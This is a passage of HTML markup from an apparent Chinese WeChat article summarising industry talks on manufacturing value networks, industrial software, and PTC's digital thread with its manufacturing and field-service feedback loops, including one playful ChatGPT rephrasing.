style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">这些</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">价值链拆分后，解构，重构，形成围绕能力的价值网络</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">。新的价值网络体系是网络化的，生态化的，共创型的，效率大幅增加，成本大幅下降，柔性大幅扩张，质量大幅提升。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">新的价值创造体系正在形成，一方面技术带来的新产品、新工艺和新赛道，另一方面是数字化带来的新型分工模式。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000199" data-ratio="0.487962962962963" width="626" data-type="png" data-w="1080" height="305" src="https://wechat2rss.xlab.app/img-proxy/?k=662576a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRrEhxMAFYNfuvPl6tmBNZ3a38eBHyO0yXUA8g4mxjgHYlhIoViauxicibg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-size:14.0pt;color:#276296;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">产业网络让人均产能优异</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">机工智库</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陈琛</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">产业知识和信息网络决定价值创造方式。任何产品都已经变为了信息体，生产的本质是构建一个复杂的网络，把知识和信息注入到产品中。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">生产系统本质是信息系统的重构</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">，提高信息输入和转化的密度，生成效率就会不断提高。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">产业网络对企业产能的关键作用：</span></p></li></ul><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">第一，构建领先的数字化</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">生产网络系统</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">,实现了产品设计到制造的端到端数字化,提升协作效率。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">第二，重构全球化的</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">供应链网络</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">,实现资源和知识的优化配置,选择最佳合作伙伴。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">第三，形成一体化的</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">产业生态网络</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">,有效连接上下游企业,提升响应速度和灵活性。</span></p></li></ul></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000198" data-ratio="0.614921780986763" width="554" data-type="png" data-w="831" height="340" src="https://wechat2rss.xlab.app/img-proxy/?k=e92df142&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRRAXAxSBtrTZ7d4LGR0OicwB2cF7wsvLEOtgbfeEbj3CjTyFMkTx6dJQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">制造业升级的内核是价值链加速重构</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">机工智库</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陈琛</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">中国不再只是价值链的一个低端环节的分包商或参与者，而是开始参与</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">完整的技术链、价值链和并形成价值网络</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">，反映了中国制造业的技术升级和全球产业格局的变革，强调了企业从零部件生产到整机构建的演变，以及服务链、信息链的发展对提升竞争力的关键作用。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">基于产品的服务、基于软件的服务、基于平台的服务或者基于人的服务，这种</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">“非实体”的价值</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">越来越多的超过基于硬件、基础设施、资本提供的价值创造，所以价值创造的方式或者价值本身也发生变化。</span></p></li></ul><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">消费互联网和工业互联网的交集就是工业软件</span><span style="font-family:
Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">西门子</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陆云强</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">物联网</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US"> + </span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">互联网主要连接和服务消费者，从个人需求出发，是消费者的数字化，颗粒度是从小到大，从智能设备、到智能家居，再到智慧城市。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">物联网</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US"> + </span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">工业互联网则侧重于连接和服务制造业资产，实现制造业资产的数字化，服务于产业，从最大化效率出发，数字化的颗粒度方向是从大到小，偏向自上而下的系统化，从智慧城市，到智能生产线，再到智能机器。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">工业软件作为连接上述两者的纽带。</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">有了消费者的画像，了解自己制造的资产，就可以根据消费者的需求去发生改变，中间怎么把消费者的需求转化成产品的东西就是工业软件</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">工业软件通过分析消费者需求转化为产品的设计和制造需求，实现产品的快速响应市场，促进消费互联网和工业互联网进一步融合，进而让</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;" lang="zh-CN">制造商和消费者关系的主旋律，从</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;" lang="en-US">M2C</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;color:#FA0000;" lang="zh-CN">变革为</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;" lang="en-US">C2M</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000202" data-ratio="0.5525423728813559" width="580" data-type="png" data-w="885" height="320" src="https://wechat2rss.xlab.app/img-proxy/?k=370caea5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRU2772dMmyDXEfgwRfQTtoWtYJCrDMSBQWiatl52icRDQSymwTBzKpQhg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;" lang="zh-CN">🔄</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">主题</span><span style="font-family:Calibri;" lang="en-US">3</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">：数字化模型和闭环反馈</span></h1><h2 style="margin:0in;font-size:14.0pt;color:#276296;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">数字化技术使用发展路线图即数字化三维模型</span><span style="font-family:
Calibri;" lang="en-US"><span style="mso-spacerun:yes;">  </span>- </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">西门子</span><span style="font-family:
Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陆云强</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">工业软件在数字化转型中发挥关键作用，通过数据实现从市场到工厂的协同和优化，是实现产品快速响应市场的关键。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">工业软件连接需求管理、产品设计到制造和服务的全流程，提高企业响应速度和效率。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">陆云强提出</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">数字化三维模型</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">，具体到三个维度：</span></p></li></ul><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">建模层次维度涵盖了数字化的不同粒度需求</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">数字孪生深度维度体现了数字孪生从数据到决策的演进过程</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">生命周期维度连接了制造业各个环节。</span></p></li></ul></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000204" data-ratio="0.5723684210526315" width="572" data-type="png" data-w="912" height="327" src="https://wechat2rss.xlab.app/img-proxy/?k=51342555&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRyDjOmMauvdHuJggHBGgvgOWUXMPa7OY5rdMuSlgUovO4zw9GbbybEA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-size:14.0pt;color:#276296;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">数字主线如同一场唯美的恋曲</span><span style="font-family:Calibri;" lang="en-US"> - PTC.</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">郎燕</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">数字主线是在物理实际和数字世界之间构建了一个跨越整个产品生命周期的闭环链路，确保提供准确的产品和流程信息，即在正确的时间、给正确的人、以正确的上下文信息，延伸到价值链各个环节。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">chatgpt：</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(172, 57, 255);">数字主线如同一场唯美的恋曲，巧妙地编织了物理实际与数字世界的纠葛，跨越整个产品生命周期，犹如一曲动人的旋律，确保在恰到好处的时光、交付给恰如其分的人，携带着正确的情境信息，婉转地延伸至价值链的每一个环节，如同邂逅命中天子的甜蜜心情</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">PTC以无工业基因的方式探索了CAD、PLM、IoT、SAAS等多个领域，形成数字主线，这显示了企业在数字化转型中要有不寻常的创新和思维，不拘泥于传统发展路径。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000205" data-ratio="0.5778611632270169" width="619" data-type="png" data-w="1066" height="357" src="https://wechat2rss.xlab.app/img-proxy/?k=9ec73fcf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRuHKWwkRaBUorlM5Dnuic9J8ibdInkFGkonGs4JOsVrjcicSdzF2DJvMKw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">数字主线贯穿和连接产品链、价值链和资产连</span><span style="font-family:
Calibri;" lang="en-US"> - PTC.</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">郎燕</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">数字主线(Digital
     Thread)贯穿并连接了</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">产品链(Product Chain)、价值链(Value Chain)和资产链(Assets Chain)</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">的整个生命周期。</span></p></li></ul><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">产品链通常是指创建产品的端到端过程，涵盖从设计和开发到制造、分销，甚至处置或回收的各个方面。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">价值链代表公司用于为其客户创造价值的所有活动和流程。它不仅包括生产或制造过程（产品链），还包括市场营销、分销和客户服务等活动。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">资产链可能指的是在其整个生命周期内管理物理资产，包括设备、机械和设施。</span></p></li></ul></ul><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">数字主线(Digital
     Thread)是指利用数字化技术，覆盖产品全生命周期、全价值链，构建数物融合、贯通产品研发、制造、营销、运营和服务等各环节的数字化数据流，为企业各个层面提供实时的数据分析和决策支持。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000203" data-ratio="0.5816993464052288" width="612" data-type="png" data-w="918" height="355" src="https://wechat2rss.xlab.app/img-proxy/?k=1abed650&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRFshKA6SJuibhiakzT6SoAiaK7NmcLH7x47ZGx97wP13p2R5MYe2qicvKsQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">工厂制造工程和现场服务工程反馈于产品工程形成闭环</span><span style="font-family:
Calibri;" lang="en-US"> - PTC.</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">郎燕</span><span style="font-family:Calibri;" lang="en-US"> </span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">数字主线的两大循环</span></p></li></ul><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">一是</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">现场反馈</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">，即服务数字主线，服务工程的反馈优化产品工程的产品质量、机队分析、面向服务设计和环境影响分析。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">二是</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">制造反馈</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">，即制造数字主线，制造工程的反馈优化产品工程的产品质量、价值工程、面向质量设计、环境影响分析。</span></p></li></ul></ul><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">服务工程包括服务</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">bom</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">转换、维修过程规划、服务手册或维修操作指导，以及产品运营的客户运营、服务执行、服务备件计划或库存预测优化；服务工程内部小循环，产品运营反馈于服务工程；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">制造工程包括制造</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">bom</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">转换，制造过程规划、装配操作指导，以及生产运营的生产执行、绩效分析。制造工程内部小循环，是生产运营反馈于制造工程。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">产品工程包括产品规划</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">/</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">概念设计、系统工程</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">/</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">详细设计、供应链协同、仿真</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">/</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">虚拟样机，平台</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">/</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">配置管理。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000206" data-ratio="0.5715676728334956" width="547" data-type="png" data-w="1027" height="313" src="https://wechat2rss.xlab.app/img-proxy/?k=312c9653&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRFGljcxf9IpvU419B09fibiccbItib7KnBooUDpdanzcDdmVXcmvHJWlog%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">双系统循环的愿景，即健壮执行和敏捷优化的平衡</span><span style="font-family:
Calibri;" lang="en-US"> - PTC.</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">郎燕</span><span style="font-family:Calibri;" lang="en-US"> </span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="en-US">ptc</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">的愿景包含工程到制造以及工程到现场主线，即</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;" lang="zh-CN">两大系统的互动循环</span></p></li></ul><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">一是制造和记录系统，要求健壮，每日重复工作，是执行的触点。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">二是智能系统，要求敏捷，每天做的稍微更好一点，是优化的系统。</span></p></li></ul></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000210" data-ratio="0.576593720266413" width="566" data-type="png" data-w="1051" height="326" src="https://wechat2rss.xlab.app/img-proxy/?k=b65fe1f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPR4e1QU1iaaniaYw7wbbMRyl7lq7n3DibDAe9Xhh0ic48fibwFb6jdKu2YzJA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">制造和记录系统：</span></p></li></ul><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">产品工程包括产品规划</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">/</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">概念设计、系统工程</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">/</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">详细设计、供应链协同、仿真</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">/</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">虚拟样机，平台</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">/</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">配置管理。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">制造工程包括制造</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">bom</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">转换，制造过程规划、装配操作指导。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">生产执行包括生产执行、</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">CMMS/</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">可靠性，质量保障。</span></p></li></ul></ul><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">智能系统：</span></p></li></ul><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">产品分析包括：产品创新洞察、设计洞察、产品洞察、环境洞察、产品质量洞察；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">过程分析包括人员洞察、资产洞察、质量洞察；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">生产运营分析包括劳动力分析、资产分析和质量洞察。</span></p></li></ul></ul><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">产品分析指导产品工程；工艺过程分析优化制造工程；生产运营分析提升生产执行。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000207" data-ratio="0.5592592592592592" width="564" data-type="png" data-w="1080" height="315" src="https://wechat2rss.xlab.app/img-proxy/?k=fd4bf7ed&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRCP4DQnfAjeLcx6OzwBick3zGjrjBWLMwKKLMXicGKAFSxY8ibBJgwEt1w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;" lang="zh-CN">💫 </span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">主题</span><span style="font-family:Calibri;" lang="en-US">4</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">：顶级客户与数字化设计技术</span></h1><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
